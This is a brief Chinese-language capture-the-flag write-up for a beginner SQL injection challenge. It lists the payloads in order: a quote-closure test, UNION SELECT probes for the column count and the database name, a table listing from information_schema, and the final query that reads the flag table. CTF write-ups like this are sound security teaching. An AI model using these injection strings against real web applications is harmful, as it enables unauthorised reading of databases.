0x00 前言
- CTF 加解密合集
- CTF Web合集
0x01 题目
最简单的SQL注入
0x02 Write Up
这道题很多wp,但是为了完整性还是写一下
知道这里是sql注入,确认一下是什么类型的闭合
使用a' or 1=1 #
进行测试
可以知道闭合是单引号闭合,然后查一下显示的位数
a' union select 1,2,3 #
然后查一下数据库
a' union select 1,database(),3 #
然后知道库了之后,锁定一下数据表
a' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database();#
然后查一下数据
a' union select 1,falg,3 from web2.flag#
以上